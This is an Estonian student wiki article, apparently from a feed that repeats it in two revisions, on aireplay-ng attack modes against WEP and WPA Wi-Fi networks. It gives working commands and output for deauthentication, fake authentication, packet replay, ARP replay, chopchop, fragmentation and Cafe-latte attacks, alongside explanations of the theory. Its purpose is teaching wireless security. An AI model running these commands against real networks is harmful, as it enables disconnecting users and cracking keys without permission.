Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:40:20  Sending Authentication Request&lt;br /&gt;
21:40:20  Authentication successful&lt;br /&gt;
21:40:20  Sending Association Request&lt;br /&gt;
21:40:20  Association successful :-)&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;...&lt;br /&gt;
15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0&lt;br /&gt;
 Read 4 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 68, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 de00 0014 6c7e 4080 000f b534 3030  .A....l~@....400&lt;br /&gt;
      0x0010:  ffff ffff ffff 4045 d16a c800 6f4f ddef  ......@E.j..oO..&lt;br /&gt;
      0x0020:  b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162  ...|.*d....c..Ab&lt;br /&gt;
      0x0030:  8ad9 2f74 16bb abcf 232e 97ee 5e45 754d  ../t....#...^EuM&lt;br /&gt;
      0x0040:  23e0 883e                                #..&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0&lt;br /&gt;
 Read 10 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 124, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 2c00 0014 6c7e 4080 000f b534 3030  .A,...l~@....400&lt;br /&gt;
      0x0010:  0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7  .@.w....=y...Y+.&lt;br /&gt;
      0x0020:  96e7 fadf e0de 2e99 c019 4f85 9508 3bcc  ..........O...;.&lt;br /&gt;
      0x0030:  8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7  ..........X...{.&lt;br /&gt;
      0x0040:  8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d  ..i...;.Cj..v,..&lt;br /&gt;
      0x0050:  7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913  zW?=.&amp;lt;.....emf..&lt;br /&gt;
      0x0060:  9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825  ....o..h+ U...%&lt;br /&gt;
      0x0070:  bf22 960a 5c7b 3036 290a 89d6            .&amp;quot;..\{06)...&lt;br /&gt;
 &lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
 Saving ARP requests in replay_arp-0001-123456.cap&lt;br /&gt;
 You should also start airodump-ng to capture replies.&lt;br /&gt;
 Read 11978 packets (got 7193 ARP requests), sent 3902 packets...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32792</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32792"/>
		<updated>2011-05-24T19:06:06Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Rünnak 3: ARP request replay attack */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
